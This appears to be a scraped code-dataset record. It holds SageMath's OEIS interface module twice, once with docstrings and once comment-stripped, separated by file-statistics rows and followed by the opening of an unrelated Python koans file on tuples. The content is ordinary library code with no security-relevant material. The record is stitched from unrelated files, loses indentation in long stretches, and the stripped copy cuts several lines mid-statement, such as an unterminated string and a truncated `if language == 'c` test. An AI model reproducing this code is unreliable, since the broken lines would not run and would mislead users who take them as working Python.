        sage: for i in s: pass
    """
    yield from self.first_terms()
    # Unless the sequence is known to be full, signal that more terms
    # exist but are not available offline.
    if self.is_full() is not True:
        raise LookupError("Future values not provided by OEIS.")
def references(self):
    r"""
    Return a tuple of references associated to the sequence ``self``.

    OUTPUT:

    - tuple of strings (with fancy formatting).

    EXAMPLES::

        sage: w = oeis(7540) ; w            # optional -- internet
        A007540: Wilson primes: primes p such that (p-1)! == -1 (mod p^2).
        sage: w.references()                # optional -- internet
        0: A. H. Beiler, Recreations in the Theory of Numbers, Dover, NY, 1964, p. 52.
        1: C. Clawson, Mathematical Mysteries, Plenum Press, 1996, p. 180.
        ...

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s.references()[1]
        'Lewis Carroll, The Hunting of the Snark.'
    """
    # References live on the %D lines.
    reference_lines = self._field('D')
    return FancyTuple(reference_lines)
def links(self, browse=None, format='guess'):
    r"""
    Return, display or browse links associated to the sequence ``self``.

    INPUT:

    - ``browse`` -- an integer, a list of integers, or the word 'all'
      (default: ``None``) : which links to open in a web browser.

    - ``format`` -- string (default: 'guess') : how to display the links.

    OUTPUT:

    - tuple of strings (with fancy formatting):

      - if ``format`` is ``url``, returns a tuple of absolute links without description.
      - if ``format`` is ``html``, returns nothing but prints a tuple of clickable absolute links in their context.
      - if ``format`` is ``guess``, adapts the output to the context (command line or notebook).
      - if ``format`` is ``raw``, the links as they appear in the database, relative links are not made absolute.

    EXAMPLES::

        sage: f = oeis(45) ; f              # optional -- internet
        A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
        sage: f.links(format='url')         # optional -- internet
        0: https://oeis.org/A000045/b000045.txt
        1: ...

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s.links(format='raw')[2]
        'Do not confuse with the sequence <a href="/A000042">A000042</a> or the sequence <a href="/A000024">A000024</a>'

        sage: s.links(format='url')[3]
        'https://oeis.org/A000024'
    """
    # Rewrite relative hrefs ('href="/A000042"') into absolute OEIS URLs
    # by replacing the leading '"/' with '"' + oeis_url.
    url_absolute = lambda s: re.sub(r'\"\/', '\"' + oeis_url, s)
    if browse is None:
        if format == 'guess':
            # Pick html inside the notebook, plain urls on the command line.
            if embedded():
                return self.links(format='html')
            else:
                return self.links(format='url')
        elif format == 'raw':
            # The %H lines, verbatim.
            return FancyTuple(self._field('H'))
        elif format == 'html':
            return HtmlFragment(FancyTuple([url_absolute(_) for _ in self._field('H')]))
        elif format == 'url':
            # Extract the bare URLs from each (absolutized) %H line.
            url_list = flatten([_urls(url_absolute(string)) for string in self._field('H')])
            return FancyTuple(url_list)
    else:
        # Browse mode: open the selected link(s); ``format`` is ignored.
        import webbrowser
        url_list = flatten([_urls(url_absolute(string)) for string in self._field('H')])
        if isinstance(browse, (int, Integer)):
            webbrowser.open(url_list[browse])
        elif isinstance(browse, (list, tuple)):
            for url_number in browse:
                webbrowser.open(url_list[url_number])
        elif browse == 'all':
            for url in url_list:
                webbrowser.open(url)
def formulas(self):
    r"""
    Return a tuple of formulas associated to the sequence ``self``.

    OUTPUT:

    - tuple of strings (with fancy formatting).

    EXAMPLES::

        sage: f = oeis(45) ; f              # optional -- internet
        A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
        sage: f.formulas()[2]               # optional -- internet
        'F(n) = ((1+sqrt(5))^n - (1-sqrt(5))^n)/(2^n*sqrt(5)).'

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s.formulas()
        0: For n big enough, s(n+1) - s(n) = 0.
    """
    # Formulas live on the %F lines.
    formula_lines = self._field('F')
    return FancyTuple(formula_lines)
def cross_references(self, fetch=False):
    r"""
    Return a tuple of cross references associated to the sequence
    ``self``.

    INPUT:

    - ``fetch`` -- boolean (default: ``False``).

    OUTPUT:

    - if ``fetch`` is ``False``, return a list of OEIS IDs (strings).
    - if ``fetch`` if ``True``, return a tuple of OEIS sequences.

    EXAMPLES::

        sage: nbalanced = oeis("A005598") ; nbalanced   # optional -- internet
        A005598: a(n) = 1 + Sum_{i=1..n} (n-i+1)*phi(i).
        sage: nbalanced.cross_references()              # optional -- internet
        ('A049703', 'A049695', 'A103116', 'A000010')

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s.cross_references()
        ('A000042', 'A000024')
    """
    # Scan the %Y lines for anything shaped like an A-number.
    ids = re.findall('A[0-9]{6}', " ".join(self._field('Y')))
    if fetch:
        return FancyTuple([oeis.find_by_id(i) for i in ids])
    return tuple(ids)
def extensions_or_errors(self):
    r"""
    Return a tuple of extensions or errors associated to the
    sequence ``self``.

    OUTPUT:

    - tuple of strings (with fancy formatting).

    EXAMPLES::

        sage: sfibo = oeis('A039834') ; sfibo       # optional -- internet
        A039834: a(n+2) = -a(n+1) + a(n) (signed Fibonacci numbers) with a(-2) = a(-1) = 1; or Fibonacci numbers (A000045) extended to negative indices.
        sage: sfibo.extensions_or_errors()[0]       # optional -- internet
        'Signs corrected by _Len Smiley_ and _N. J. A. Sloane_'

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s.extensions_or_errors()
        0: This sequence does not contain errors.
    """
    # Extensions and errata live on the %E lines.
    extension_lines = self._field('E')
    return FancyTuple(extension_lines)
def examples(self):
r"""
Return a tuple of examples associated to the sequence ``self``.
OUTPUT:
- tuple of strings (with fancy formatting).
EXAMPLES::
sage: c = oeis(1203) ; c # optional -- internet
A001203: Simple continued fraction expansion of Pi.
sage: c.examples() # optional -- internet
0: Pi = 3.1415926535897932384...
1: = 3 + 1/(7 + 1/(15 + 1/(1 + 1/(292 + ...))))
2: = [a_0; a_1, a_2, a_3, ...] = [3; 7, 15, 1, 292, ...]
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.examples()
0: s(42) + s(43) = 0.
"""
return FancyTuple(self._field('e'))
def comments(self):
r"""
Return a tuple of comments associated to the sequence ``self``.
OUTPUT:
- tuple of strings (with fancy formatting).
EXAMPLES::
sage: f = oeis(45) ; f # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: f.comments()[:3] # optional -- internet
0: Also sometimes called Lamé's sequence.
1: F(n+2) = number of binary sequences of length n that have no consecutive 0's.
2: F(n+2) = number of subsets of {1,2,...,n} that contain no consecutive integers.
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.comments()
0: 42 is the product of the first 4 prime numbers, except 5 and perhaps 1.
1: Apart from that, i have no comment.
"""
return FancyTuple(self._field('C'))
def url(self):
r"""
Return the URL of the page associated to the sequence ``self``.
OUTPUT:
- string.
EXAMPLES::
sage: f = oeis(45) ; f # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: f.url() # optional -- internet
'https://oeis.org/A000045'
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.url()
'https://oeis.org/A999999'
"""
return oeis_url + self.id()
def browse(self):
r"""
Open the OEIS web page associated to the sequence ``self`` in a browser.
EXAMPLES::
sage: f = oeis(45) ; f # optional -- internet webbrowser
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: f.browse() # optional -- internet webbrowser
TESTS::
sage: s = oeis._imaginary_sequence() # optional -- webbrowser
sage: s.browse() # optional -- webbrowser
"""
import webbrowser
webbrowser.open(self.url())
def show(self):
r"""
Display most available informations about the sequence ``self``.
EXAMPLES::
sage: s = oeis(12345) # optional -- internet
sage: s.show() # optional -- internet
ID
A012345
<BLANKLINE>
NAME
Coefficients in the expansion sinh(arcsin(x)*arcsin(x)) = 2*x^2/2!+8*x^4/4!+248*x^6/6!+11328*x^8/8!+...
<BLANKLINE>
FIRST TERMS
(2, 8, 248, 11328, 849312, 94857600, 14819214720, 3091936512000, 831657655349760, 280473756197529600, 115967597965430077440, 57712257892456911912960, 34039765801079493369569280)
<BLANKLINE>
LINKS
0: https://oeis.org/A012345/b012345.txt
<BLANKLINE>
FORMULAS
...
OFFSETS
(0, 1)
<BLANKLINE>
URL
https://oeis.org/A012345
<BLANKLINE>
AUTHOR
Patrick Demichel (patrick.demichel(AT)hp.com)
<BLANKLINE>
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.show()
ID
A999999
<BLANKLINE>
NAME
The characteristic sequence of 42 plus ...
FIRST TERMS
(1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ...
<BLANKLINE>
COMMENTS
0: 42 is the product of the first 4 prime numbers, except ...
1: Apart from that, i have no comment.
...
"""
for s in ['id', 'name', 'first_terms', 'comments', 'references',
'links', 'formulas', 'examples', 'cross_references',
'programs', 'keywords', 'offsets', 'url', 'old_IDs',
'author', 'extensions_or_errors']:
if embedded() and s == 'links':
print(re.sub('_', ' ', s).upper())
getattr(self, s)()
print('\n')
else:
result = getattr(self, s)()
if result != '' and result != ('',) and result != ():
print(re.sub('_', ' ', s).upper())
print(str(result) + '\n')
    def programs(self, language='all', preparsing=True, keep_comments=False):
        r"""
        Return programs for the sequence ``self`` in the given ``language``.

        INPUT:

        - ``language`` -- string (default: 'all'), the chosen language.
          Possible values are 'all' for the full list, or
          any language name, for example 'sage', 'maple', 'mathematica', etc.

        Some further optional input is specific to sage code treatment:

        - ``preparsing`` -- boolean (default: ``True``) whether to preparse
          sage code

        - ``keep_comments`` -- boolean (default: ``False``) whether to keep
          comments in sage code

        OUTPUT:

        If ``language`` is ``'all'``, this returns a sorted list of pairs
        (language, code), where every language can appear several times.

        Otherwise, this returns a list of programs in the ``language``,
        each program being a tuple of strings (with fancy formatting).

        EXAMPLES::

            sage: ee = oeis('A001113') ; ee             # optional -- internet
            A001113: Decimal expansion of e.
            sage: ee.programs('pari')[0]                # optional -- internet
            0: default(realprecision, 50080); x=exp(1); for (n=1, 50000, d=floor(x); x=(x-d)*10; write("b001113.txt", n, " ", d)); \\ _Harry J. Smith_, Apr 15 2009

            sage: G = oeis.find_by_id('A27642')         # optional -- internet
            sage: G.programs('all')                     # optional -- internet
            [('haskell', ...),
             ('magma', ...),
             ...
             ('python', ...),
             ('sage', ...)]

        TESTS::

            sage: s = oeis._imaginary_sequence()
            sage: s.programs()
            [('maple', ...),
             ('mathematica', ...),
             ('python',
              0: def A999999(n):
              1:     assert(isinstance(n, (int, Integer))), "n must be an integer."
              2:     if n < 38:
              3:         raise ValueError("The value %s is not accepted." %str(n))
              4:     elif n == 42:
              5:         return 2
              6:     else:
              7:         return 1)]
            sage: s.programs('maple')[0]
            0: Do not even try, Maple is not able to produce such a sequence.
            sage: s.programs('mathematica')[0]
            0: Mathematica neither.
        """
        language = language.lower()
        # Maple and Mathematica have dedicated OEIS fields (%p and %t), so
        # they can be answered directly without parsing the %o block.
        if language == "maple":
            return [FancyTuple(self._field('p'))]
        elif language == "mathematica":
            return [FancyTuple(self._field('t'))]
        # 'sagemath' is accepted as a synonym for 'sage'.
        if language == 'sagemath':
            language = 'sage'
        # For 'all', seed the result table with the dedicated fields; the
        # remaining languages are parsed out of the shared %o field below.
        if language == 'all':
            table = [('maple', FancyTuple(self._field('p'))),
                     ('mathematica', FancyTuple(self._field('t')))]
        else:
            table = []
        def is_starting_line(line):
            """
            Help to split the big OEIS code block into blocks by language.

            This returns ``None`` if ``line`` is not a starting line.
            """
            # A starting line looks like "(Language) optional first code line".
            if not line.startswith('('):
                return None
            if ')' not in line:
                return None
            end = line.index(')')
            language = line[1:end].lower()  # to handle (Sage) versus (sage)
            # A '(' inside the parenthesis means this is code, not a header.
            if '(' in language:
                return None
            if language == 'sagemath':
                language = 'sage'
            if language == 'c#' or language == 'c++':
                language = 'c'
            if language.replace(' ', '').isalnum() or language.startswith('scheme'):
                # to cope with many wrong (Scheme xxx) separators in the OEIS
                return (language, end)
            return None
        def filter_sage(lines):
            """
            Remove comments and preparse if required, only for sage code.

            This is an iterator.
            """
            for line in lines:
                if keep_comments or not line.strip().startswith('#'):
                    if preparsing:
                        yield preparse(line)
                    else:
                        yield line
        def flush_to_table(language, code_lines):
            """
            Put a list of code lines into the appropriate box of the table.

            With special treatment for sage code blocks.
            """
            if language == 'sage':
                table.append((language, FancyTuple(filter_sage(code_lines))))
            elif language is not None:
                table.append((language, FancyTuple(code_lines)))
        # Walk the %o field line by line, accumulating code until the next
        # "(Language)" header flushes the current block into the table.
        programs = FancyTuple(self._field('o'))
        code_lines = []
        old_language = None
        for line in programs:
            new_language = is_starting_line(line)
            if new_language is not None:
                # flush the stock of code lines if any
                flush_to_table(old_language, code_lines)
                # start new stock of code lines
                old_language, end = new_language
                rest = line[end + 1:].strip()
                code_lines = [rest] if rest else []
            else:
                code_lines.append(line)
        # Flush the trailing block collected after the last header.
        flush_to_table(old_language, code_lines)
        if language == 'all':
            return sorted(table)
        return sorted(prog for la, prog in table if la == language)
def test_compile_sage_code(self):
"""
Try to compile the extracted sage code, if there is any.
If there are several sage code fields, they are all considered.
Dead sequences are considered to compile correctly by default.
This returns ``True`` if the code compiles, and raises an error
otherwise.
EXAMPLES:
One correct sequence::
sage: s = oeis.find_by_id('A027642') # optional -- internet
sage: s.test_compile_sage_code() # optional -- internet
True
One dead sequence::
sage: s = oeis.find_by_id('A000154') # optional -- internet
sage: s.test_compile_sage_code() # optional -- internet
doctest:warning
...
RuntimeWarning: This sequence is dead: ...
True
"""
if self.is_dead():
return True
filt = self.programs(language='sage')
if filt:
for v in filt:
tp = tmp_filename(ext='.sage')
_ = compile('\n'.join(v), tp, 'exec')
return True
class FancyTuple(tuple):
    r"""
    A ``tuple`` subclass whose ``repr`` shows one element per line,
    each prefixed by its index, as long as every element has a one
    line representation.

    EXAMPLES::

        sage: from sage.databases.oeis import FancyTuple
        sage: t = FancyTuple(['zero', 'one', 'two', 'three', 4]) ; t
        0: zero
        1: one
        2: two
        3: three
        4: 4

        sage: t[2]
        'two'
    """
    def __repr__(self):
        r"""
        Print the tuple with one value per line, where each line
        begins with the index of the value in ``self``.

        EXAMPLES::

            sage: from sage.databases.oeis import FancyTuple
            sage: t = FancyTuple(['zero', 'one', 'two', 'three', 4]) ; t
            0: zero
            1: one
            2: two
            3: three
            4: 4

            sage: t = FancyTuple(['Français', 'Español', '中文']) ; t
            0: Français
            1: Español
            2: 中文
        """
        # Right-align the indices on the width of the largest one.
        width = len(str(len(self) - 1))
        rows = ['{0:>{1}}: {2}'.format(idx, width, entry)
                for idx, entry in enumerate(self)]
        return '\n'.join(rows)

    def __getslice__(self, i, j):
        r"""
        The slice of a FancyTuple remains a FancyTuple.

        EXAMPLES::

            sage: from sage.databases.oeis import FancyTuple
            sage: t = FancyTuple(['zero', 'one', 'two', 'three', 4])
            sage: t[-2:]
            0: three
            1: 4

        TESTS::

            sage: t = ('é', 'è', 'à', 'ç')
            sage: FancyTuple(t)[2:4]
            0: à
            1: ç
        """
        # Delegate to __getitem__, which knows how to wrap slices.
        return self.__getitem__(slice(i, j))

    def __getitem__(self, x):
        r"""
        If ``x`` is a slice return the corresponding sub FancyTuple,
        else return the ``x``-th item of ``self``.

        TESTS::

            sage: from sage.databases.oeis import FancyTuple
            sage: t = ('é', 'è', 'à', 'ç')
            sage: ft = FancyTuple(t)
            sage: ft[0] == 'é'
            True
            sage: ft[-1] == 'ç'
            True

        Check that :trac:`26997` is fixed::

            sage: FancyTuple([[1,2,3],(4,5,6)])
            0: [1, 2, 3]
            1: (4, 5, 6)
        """
        picked = tuple.__getitem__(self, x)
        # Only slices are re-wrapped; single items come back unchanged.
        return FancyTuple(picked) if isinstance(x, slice) else picked
# The unique shared instance of the OEIS interface: this is the object
# users call, e.g. ``oeis(45)`` or ``oeis.find_by_id('A000045')``.
oeis = OEIS()
| 34.898482 | 189 | 0.516652 |
from __future__ import print_function
from urllib.request import urlopen
from urllib.parse import urlencode
from sage.structure.sage_object import SageObject
from sage.structure.unique_representation import UniqueRepresentation
from sage.cpython.string import bytes_to_str
from sage.rings.integer import Integer
from sage.misc.verbose import verbose
from sage.misc.cachefunc import cached_method
from sage.misc.flatten import flatten
from sage.misc.temporary_file import tmp_filename
from sage.misc.unknown import Unknown
from sage.misc.misc import embedded
from sage.misc.html import HtmlFragment
from sage.repl.preparse import preparse
from collections import defaultdict
import re
oeis_url = 'https://oeis.org/'
def _fetch(url):
try:
verbose("Fetching URL %s ..." % url, caller_name='OEIS')
f = urlopen(url)
result = f.read()
f.close()
return bytes_to_str(result)
except IOError as msg:
raise IOError("%s\nError fetching %s." % (msg, url))
def _urls(html_string):
urls = []
from html.parser import HTMLParser
class MyHTMLParser(HTMLParser):
def handle_starttag(self, tag, attrs):
if tag == 'a':
for attr in attrs:
if attr[0] == 'href':
urls.append(attr[1])
MyHTMLParser().feed(html_string)
return urls
to_tuple = lambda string: tuple(Integer(x) for x in string.split(",") if x)
class OEIS:
def __call__(self, query, max_results=3, first_result=0):
if isinstance(query, str):
if re.match('^A[0-9]{6}$', query):
return self.find_by_id(query)
else:
return self.find_by_description(query, max_results, first_result)
elif isinstance(query, (int, Integer)):
return self.find_by_id(query)
elif isinstance(query, (list, tuple)):
return self.find_by_subsequence(query, max_results, first_result)
def __repr__(self):
return "The On-Line Encyclopedia of Integer Sequences (%s)" % oeis_url
def find_by_id(self, ident, fetch=False):
sequence = OEISSequence(ident=ident)
if fetch:
sequence.online_update()
return sequence
def find_by_entry(self, entry):
ident = entry[3:10]
sequence = OEISSequence(ident=ident)
sequence._raw = entry
return sequence
def find_by_description(self, description, max_results=3, first_result=0):
options = {'q': description,
'n': str(max_results),
'fmt': 'text',
'start': str(first_result)}
url = oeis_url + "search?" + urlencode(options)
sequence_list = _fetch(url).split('\n\n')[2:-1]
return FancyTuple([self.find_by_entry(entry=_) for _ in sequence_list])
def find_by_subsequence(self, subsequence, max_results=3, first_result=0):
subsequence = str(subsequence)[1:-1]
return self.find_by_description(subsequence, max_results, first_result)
def browse(self):
import webbrowser
webbrowser.open(oeis_url)
def _imaginary_entry(self, ident='A999999', keywords=''):
return ('%I ' + ident + ' M9999 N9999\n'
'%S ' + ident + ' 1,1,1,1,2,1,1,1,\n'
'%T ' + ident + ' 1,1,1,1,1,1,1,1,1,\n'
'%U ' + ident + ' 1,1,1,1,1,1,1,1,1\n'
'%N ' + ident + ' The characteristic sequence of 42 plus one, starting from 38.\n'
'%D ' + ident + ' Lewis Carroll, Alice\'s Adventures in Wonderland.\n'
'%D ' + ident + ' Lewis Carroll, The Hunting of the Snark.\n'
'%D ' + ident + ' Deep Thought, The Answer to the Ultimate Question of Life, The Universe, and Everything.\n'
'%H ' + ident + ' Wikipedia, <a href="https://en.wikipedia.org/wiki/42_(number)">42 (number)</a>\n'
'%H ' + ident + ' See. also <a href="https://trac.sagemath.org/sage_trac/ticket/42">trac ticket
'%H ' + ident + ' Do not confuse with the sequence <a href="/A000042">A000042</a> or the sequence <a href="/A000024">A000024</a>\n'
'%H ' + ident + ' The string http://42.com is not a link.\n'
'%F ' + ident + ' For n big enough, s(n+1) - s(n) = 0.\n'
'%Y ' + ident + ' Related sequences are A000042 and its friend A000024.\n'
'%A ' + ident + ' Anonymous.\n'
'%O ' + ident + ' 38,4\n'
'%E ' + ident + ' This sequence does not contain errors.\n'
'%e ' + ident + ' s(42) + s(43) = 0.\n'
'%p ' + ident + ' Do not even try, Maple is not able to produce such a sequence.\n'
'%t ' + ident + ' Mathematica neither.\n'
'%o ' + ident + ' (Python)\n'
'%o ' + ident + ' def ' + ident + '(n):\n'
'%o ' + ident + ' assert(isinstance(n, (int, Integer))), "n must be an integer."\n'
'%o ' + ident + ' if n < 38:\n'
'%o ' + ident + ' raise ValueError("The value %s is not accepted." %str(n))\n'
'%o ' + ident + ' elif n == 42:\n'
'%o ' + ident + ' return 2\n'
'%o ' + ident + ' else:\n'
'%o ' + ident + ' return 1\n'
'%K ' + ident + ' ' + keywords + '\n'
'%C ' + ident + ' 42 is the product of the first 4 prime numbers, except 5 and perhaps 1.\n'
'%C ' + ident + ' Apart from that, i have no comment.')
def _imaginary_sequence(self, ident='A999999', keywords='sign,easy'):
return self.find_by_entry(entry=self._imaginary_entry(ident=ident, keywords=keywords))
class OEISSequence(SageObject, UniqueRepresentation):
@staticmethod
def __classcall__(cls, ident):
if not isinstance(ident, str):
ident = str(ident)
ident = 'A000000'[:-len(ident)] + ident
return super(OEISSequence, cls).__classcall__(cls, ident)
def __init__(self, ident):
self._id = ident
def online_update(self):
options = {'q': self._id, 'n': '1', 'fmt': 'text'}
url = oeis_url + "search?" + urlencode(options)
self._raw = _fetch(url).split('\n\n')[2]
try:
del self._fields
except AttributeError:
pass
def _field(self, key):
try:
return self._fields[key]
except AttributeError:
fields = defaultdict(list)
for line in self.raw_entry().splitlines():
fields[line[1]].append(line[11:])
self._fields = fields
self.is_dead(warn_only=True)
return self._fields[key]
def id(self, format='A'):
if format == 'A':
return self._id
elif format == 'int':
return int(self._id[1:].lstrip("0"))
def __hash__(self):
return self.id(format='int')
def raw_entry(self):
try:
return self._raw
except AttributeError:
self.online_update()
return self._raw
def name(self):
return self._field('N')[0]
def old_IDs(self):
return tuple(self._field('I')[0].split(' '))
def offsets(self):
return to_tuple(self._field('O')[0])
def author(self):
return self._field('A')[0]
def keywords(self):
return tuple(self._field('K')[0].split(','))
def natural_object(self):
if 'cofr' in self.keywords() and 'frac' not in self.keywords():
from sage.rings.continued_fraction import continued_fraction
return continued_fraction(self.first_terms())
elif 'cons' in self.keywords():
offset = self.offsets()[0]
terms = self.first_terms() + tuple([0] * abs(offset))
from sage.rings.real_lazy import RealLazyField
return RealLazyField()('0' + ''.join(map(str, terms[:offset])) + '.' + ''.join(map(str, terms[offset:])))
elif 'nonn' in self.keywords():
from sage.structure.sequence import Sequence
from sage.rings.semirings.non_negative_integer_semiring import NN
return Sequence(self.first_terms(), NN)
else:
from sage.structure.sequence import Sequence
from sage.rings.integer_ring import ZZ
return Sequence(self.first_terms(), ZZ)
def is_dead(self, warn_only=False):
if warn_only:
if 'dead' in self.keywords():
from warnings import warn
warn('This sequence is dead: "{}: {}"'.format(self.id(), self.name()), RuntimeWarning)
else:
return 'dead' in self.keywords()
def is_finite(self):
if 'finit' in self.keywords() or 'full' in self.keywords():
return True
else:
return Unknown
def is_full(self):
if 'full' in self.keywords():
return True
else:
return Unknown
@cached_method
def first_terms(self, number=None):
fields = ['S', 'T', 'U']
return to_tuple(" ".join(flatten([self._field(a) for a in fields])))[:number]
def _repr_(self):
return "%s: %s" % (self.id(), self.name())
def __call__(self, k):
offset = self.offsets()[0]
if 'cons' in self.keywords():
offset = - offset
n = k - offset
if not 0 <= n < len(self.first_terms()):
raise ValueError("Sequence %s is not defined (or known) for index %s" % (self.id(), k))
return self.first_terms()[n]
def __getitem__(self, i):
return self.first_terms()[i]
def __iter__(self):
for x in self.first_terms():
yield x
if not self.is_full() is True:
raise LookupError("Future values not provided by OEIS.")
def references(self):
return FancyTuple(self._field('D'))
def links(self, browse=None, format='guess'):
url_absolute = lambda s: re.sub(r'\"\/', '\"' + oeis_url, s)
if browse is None:
if format == 'guess':
if embedded():
return self.links(format='html')
else:
return self.links(format='url')
elif format == 'raw':
return FancyTuple(self._field('H'))
elif format == 'html':
return HtmlFragment(FancyTuple([url_absolute(_) for _ in self._field('H')]))
elif format == 'url':
url_list = flatten([_urls(url_absolute(string)) for string in self._field('H')])
return FancyTuple(url_list)
else:
import webbrowser
url_list = flatten([_urls(url_absolute(string)) for string in self._field('H')])
if isinstance(browse, (int, Integer)):
webbrowser.open(url_list[browse])
elif isinstance(browse, (list, tuple)):
for url_number in browse:
webbrowser.open(url_list[url_number])
elif browse == 'all':
for url in url_list:
webbrowser.open(url)
def formulas(self):
return FancyTuple(self._field('F'))
def cross_references(self, fetch=False):
ref_list = re.findall('A[0-9]{6}', " ".join(self._field('Y')))
if fetch:
return FancyTuple([oeis.find_by_id(_) for _ in ref_list])
else:
return tuple(ref_list)
def extensions_or_errors(self):
return FancyTuple(self._field('E'))
def examples(self):
return FancyTuple(self._field('e'))
def comments(self):
return FancyTuple(self._field('C'))
def url(self):
return oeis_url + self.id()
def browse(self):
import webbrowser
webbrowser.open(self.url())
def show(self):
for s in ['id', 'name', 'first_terms', 'comments', 'references',
'links', 'formulas', 'examples', 'cross_references',
'programs', 'keywords', 'offsets', 'url', 'old_IDs',
'author', 'extensions_or_errors']:
if embedded() and s == 'links':
print(re.sub('_', ' ', s).upper())
getattr(self, s)()
print('\n')
else:
result = getattr(self, s)()
if result != '' and result != ('',) and result != ():
print(re.sub('_', ' ', s).upper())
print(str(result) + '\n')
def programs(self, language='all', preparsing=True, keep_comments=False):
language = language.lower()
if language == "maple":
return [FancyTuple(self._field('p'))]
elif language == "mathematica":
return [FancyTuple(self._field('t'))]
if language == 'sagemath':
language = 'sage'
if language == 'all':
table = [('maple', FancyTuple(self._field('p'))),
('mathematica', FancyTuple(self._field('t')))]
else:
table = []
def is_starting_line(line):
if not line.startswith('('):
return None
if ')' not in line:
return None
end = line.index(')')
language = line[1:end].lower() # to handle (Sage) versus (sage)
if '(' in language:
return None
if language == 'sagemath':
language = 'sage'
if language == 'c
language = 'c'
if language.replace(' ', '').isalnum() or language.startswith('scheme'):
# to cope with many wrong (Scheme xxx) separators in the OEIS
return (language, end)
return None
def filter_sage(lines):
for line in lines:
if keep_comments or not line.strip().startswith('
if preparsing:
yield preparse(line)
else:
yield line
def flush_to_table(language, code_lines):
if language == 'sage':
table.append((language, FancyTuple(filter_sage(code_lines))))
elif language is not None:
table.append((language, FancyTuple(code_lines)))
programs = FancyTuple(self._field('o'))
code_lines = []
old_language = None
for line in programs:
new_language = is_starting_line(line)
if new_language is not None:
# flush the stock of code lines if any
flush_to_table(old_language, code_lines)
# start new stock of code lines
old_language, end = new_language
rest = line[end + 1:].strip()
code_lines = [rest] if rest else []
else:
code_lines.append(line)
flush_to_table(old_language, code_lines)
if language == 'all':
return sorted(table)
return sorted(prog for la, prog in table if la == language)
def test_compile_sage_code(self):
if self.is_dead():
return True
filt = self.programs(language='sage')
if filt:
for v in filt:
tp = tmp_filename(ext='.sage')
_ = compile('\n'.join(v), tp, 'exec')
return True
class FancyTuple(tuple):
def __repr__(self):
length = len(str(len(self) - 1))
return '\n'.join('{0:>{1}}: {2}'.format(i, length, item) for i, item in enumerate(self))
def __getslice__(self, i, j):
return self.__getitem__(slice(i, j))
def __getitem__(self, x):
res = tuple.__getitem__(self, x)
if isinstance(x, slice):
res = FancyTuple(res)
return res
oeis = OEIS()
| true | true |
79010a6a64fb65b3c1d80fce8bbd1a73e90b8689 | 2,413 | py | Python | koans/koans/about_tuples.py | rhgraysonii/python_koan_solutions | 42ef060cfb7ab47cf539b4a4ea8f4b55063b9912 | [
"MIT"
] | null | null | null | koans/koans/about_tuples.py | rhgraysonii/python_koan_solutions | 42ef060cfb7ab47cf539b4a4ea8f4b55063b9912 | [
"MIT"
] | null | null | null | koans/koans/about_tuples.py | rhgraysonii/python_koan_solutions | 42ef060cfb7ab47cf539b4a4ea8f4b55063b9912 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
class AboutTuples(Koan):
    # Koans exploring how Python tuples behave.

    def test_creating_a_tuple(self):
        # Tuples are indexed exactly like lists.
        trio = (1, 2, 5)
        self.assertEqual(5, trio[2])

    def test_tuples_are_immutable_so_item_assignment_is_not_possible(self):
        trio = (1, 2, 5)
        try:
            trio[2] = "three"
        except TypeError as ex:
            self.assertMatch('upl', ex[0])

    def test_tuples_are_immutable_so_appending_is_not_possible(self):
        trio = (1, 2, 5)
        try:
            trio.append("boom")
        except Exception as ex:
            self.assertEqual(AttributeError, type(ex))
            # assertMatch() does regular-expression matching, so a
            # fragment of the message is enough.
            self.assertMatch('object', ex[0])
        # Tuples are less flexible than lists, but faster.

    def test_tuples_can_only_be_changed_through_replacement(self):
        trio = (1, 2, 5)
        mutable_copy = list(trio)
        mutable_copy.append("boom")
        trio = tuple(mutable_copy)
        self.assertEqual((1, 2, 5, 'boom'), trio)

    def test_tuples_of_one_look_peculiar(self):
        # Without the trailing comma, (1) is just a parenthesized int.
        self.assertEqual(type(int(1)), (1).__class__)
        self.assertEqual(type((1, 2)), (1,).__class__)
        self.assertEqual(('Hello comma!',), ("Hello comma!", ))

    def test_tuple_constructor_can_be_surprising(self):
        # tuple() iterates its argument, so a string explodes into characters.
        self.assertEqual(('S', 'u', 'r', 'p', 'r', 'i', 's', 'e', '!'), tuple("Surprise!"))

    def test_creating_empty_tuples(self):
        self.assertEqual(tuple(), ())
        self.assertEqual((), tuple())  # Sometimes less confusing

    def test_tuples_can_be_embedded(self):
        latitude = (37, 14, 6, 'N')
        longitude = (115, 48, 40, 'W')
        place = ('Area 51', latitude, longitude)
        self.assertEqual(('Area 51', (37, 14, 6, 'N'), (115, 48, 40, 'W')), place)

    def test_tuples_are_good_for_representing_records(self):
        sightings = [
            ("Illuminati HQ", (38, 52, 15.56, 'N'), (77, 3, 21.46, 'W')),
            ("Stargate B", (41, 10, 43.92, 'N'), (1, 49, 34.29, 'W')),
        ]
        sightings.append(("Cthulhu", (26, 40, 1, 'N'), (70, 45, 7, 'W')))
        self.assertEqual('Cthulhu', sightings[2][0])
        self.assertEqual(15.56, sightings[0][1][2])
| 33.985915 | 91 | 0.590137 |
from runner.koan import *
class AboutTuples(Koan):
def test_creating_a_tuple(self):
count_of_three = (1, 2, 5)
self.assertEqual(5, count_of_three[2])
def test_tuples_are_immutable_so_item_assignment_is_not_possible(self):
count_of_three = (1, 2, 5)
try:
count_of_three[2] = "three"
except TypeError as ex:
self.assertMatch('upl', ex[0])
def test_tuples_are_immutable_so_appending_is_not_possible(self):
